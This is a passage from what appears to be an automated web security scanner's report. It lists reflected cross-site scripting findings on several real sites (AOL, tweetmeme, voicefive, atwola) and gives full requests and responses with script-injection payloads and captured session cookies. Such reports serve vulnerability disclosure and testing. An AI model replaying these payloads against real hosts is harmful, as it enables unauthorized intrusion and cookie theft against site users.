aptureJsonCallback0([{"url":"http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D19cac7<img src=a onerror=alert(1)>428383ff7dc","normalized_url":"http:\/\/www.electronista.com\/articles\/11\/02\/04\/sales.of.glasses.free.3d.tvs.weaker.than.expected\/?e4c13%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ec3b351ab889=
...[SNIP]...

1.40. http://api.screenname.aol.com/auth/getToken [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c96be<script>alert(1)</script>92b20bf3bf8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ao1atoKNL9675h&attributes=displayName,profileUrl,pictureUrl&f=json&c=jsonp1297023979135c96be<script>alert(1)</script>92b20bf3bf8 HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:25:23 GMT
Set-Cookie: JSESSIONID=6A020E7511383C0E38BF9DB8FCE3D07B; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIHlaWi9nVVBheFN2ZUJHcFZEYUNtcjFUNVhkWT0%3D-SSQdmqasJXW7AratTMW0Ebo0fFONkRgKp3Nz8AP0G2hDlYt5hoCp0D9upWW2a1M1tALOCnjOZLBFwhvg5agWxYIVALonDKGqbQQsQOEEfCl4FW0AirWAhSnABCxmMQEil%2FSriE29mS1hitvGyQTxzNUbM7yoamEoiPR1QMeJ9Sf8QCgk%2FH84DuWWFf2GJBVS; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130

jsonp1297023979135c96be<script>alert(1)</script>92b20bf3bf8({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

1.41. http://api.tweetmeme.com/url_info.jsonc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f3298<script>alert(1)</script>b6048824017 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&callback=aptureJsonCallback1f3298<script>alert(1)</script>b6048824017 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; user_unique_ident=4d4300485cccb8.88856407-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 06 Feb 2011 20:38:11 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 374
X-Served-By: h04
Content-Length: 117

aptureJsonCallback1f3298<script>alert(1)</script>b6048824017({"status":"failure","comment":"unable to resolve URL"});

1.42. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload ac334<script>alert(1)</script>4007ecfe708 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionac334<script>alert(1)</script>4007ecfe708&n=ar_int_p85001580&1297025046004 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de&#41; ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:43:03 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionac334<script>alert(1)</script>4007ecfe708("");

1.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b311e"><script>alert(1)</script>70aa52fbe42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframeb311e"><script>alert(1)</script>70aa52fbe42/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addynb311e"><script>alert(1)</script>70aa52fbe42/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0aea"><script>alert(1)</script>048f105caf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0c0aea"><script>alert(1)</script>048f105caf6/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0c0aea"><script>alert(1)</script>048f105caf6/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac20"><script>alert(1)</script>0456f182ac8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.16ac20"><script>alert(1)</script>0456f182ac8/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.16ac20"><script>alert(1)</script>0456f182ac8/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309fa"><script>alert(1)</script>a95da17c31 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794309fa"><script>alert(1)</script>a95da17c31/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 366

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794309fa"><script>alert(1)</script>a95da17c31/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa9b"><script>alert(1)</script>f586567e29c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/07aa9b"><script>alert(1)</script>f586567e29c/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/07aa9b"><script>alert(1)</script>f586567e29c/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c27e3"><script>alert(1)</script>773b6376821 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1c27e3"><script>alert(1)</script>773b6376821/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1c27e3"><script>alert(1)</script>773b6376821/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.49. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce70a"><script>alert(1)</script>735d74c1b51 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/sizece70a"><script>alert(1)</script>735d74c1b51=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/sizece70a"><script>alert(1)</script>735d74c1b51=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844;adiframe=y">
...[SNIP]...

1.50. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=160x600

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d167e"><script>alert(1)</script>5532f5945a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844&d167e"><script>alert(1)</script>5532f5945a4=1 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844&d167e"><script>alert(1)</script>5532f5945a4=1;adiframe=y">
...[SNIP]...

